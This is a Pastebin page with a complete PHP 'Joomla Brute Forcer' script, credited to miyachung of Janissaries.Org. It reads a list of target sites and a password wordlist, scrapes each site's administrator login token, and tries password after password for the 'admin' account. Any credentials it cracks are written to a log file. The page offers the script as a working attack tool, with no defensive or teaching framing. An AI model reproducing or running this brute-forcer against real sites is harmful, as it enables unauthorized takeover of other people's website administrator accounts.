Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- set_time_limit(0);
- /*
- * Joomla Brute Forcer
- * Coded by miyachung
- * miyachung@hotmail.com
- * Janissaries.Org
- * Special Thanks burtay
- * Usage-> php Bruter.php SITELIST PASSWORDS
- * Example-> php Bruter.php SITES.txt PASSWORDS.txt
- */
- class jom
- {
- public $sites;
- public $wordlist;
- private $user = "admin";
- private $regex = "/([0-9a-f]{32})/si";
- private $timeout = 7;
- private $cookie_file = "cookie.jani";
- private $log_file = "cracks.txt";
- private function save_File($content)
- {
- $fp = fopen($this->log_file,'ab');
- fwrite($fp,$content);
- fclose($fp);
- if($fp)
- {
- return true;
- }
- else
- {
- return false;
- }
- }
- private function get_Hash($site)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
- curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
- curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
- curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
- $play = curl_exec($curl);
- curl_close($curl);
- if(preg_match('#value="com_login"#si',$play))
- {
- preg_match($this->regex,$play,$hash);
- return $hash[1];
- }
- else
- {
- echo "[-]Hash not found,passing site\n";
- return false;
- }
- }
- private function tryPassword($site,$password,$hash)
- {
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
- curl_setopt($curl,CURLOPT_POST,TRUE);
- curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
- curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
- curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
- curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
- curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."&lang=&option=com_login&task=login&".$hash."=1");
- $play = curl_exec($curl);
- curl_close($curl);
- return $play;
- }
- public function bruter()
- {
- $sites = explode("\n",file_get_contents($this->sites));
- foreach($sites as $site)
- {
- if(!preg_match('#http#si',$site)) $site = "http://".$site;
- $site = trim($site);
- echo "\n[+]$site\n";
- $hash = $this->get_Hash($site);
- if(!$hash){continue;}
- echo "[+]$hash\n";
- $wordlist = explode("\n",file_get_contents($this->wordlist));
- foreach($wordlist as $password)
- {
- $try = $this->tryPassword($site,trim($password),$hash);
- if(preg_match("/com_config/si",$try))
- {
- echo "\n\t[*]Password cracked-> ".$password."\n";
- echo "\t[*]Saved to the log file\n";
- $this->save_File("$site|$password\r\n");
- break;
- }
- }
- }
- }
- }
- if(!$argv[1] || !$argv[2])
- {
- echo "################################################\n";
- echo "\t\tJoomla Brute Forcer\n";
- echo "\t\tCoded By miyachung\n";
- echo "\t\tJanissaries.Org\n";
- echo "################################################\n";
- echo "\n[-]Missing arguments\n";
- exit;
- }
- elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
- {
- echo "################################################\n";
- echo "\t\tJoomla Brute Forcer\n";
- echo "\t\tCoded By miyachung\n";
- echo "\t\tJanissaries.Org\n";
- echo "################################################\n";
- echo "\n[-]File not found\n";
- exit;
- }
- else
- {
- echo "################################################\n";
- echo "\t\tJoomla Brute Forcer\n";
- echo "\t\tCoded By miyachung\n";
- echo "\t\tJanissaries.Org\n";
- echo "################################################\n";
- $jom = new jom;
- $jom->sites = $argv[1];
- $jom->wordlist = $argv[2];
- $jom->bruter();
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement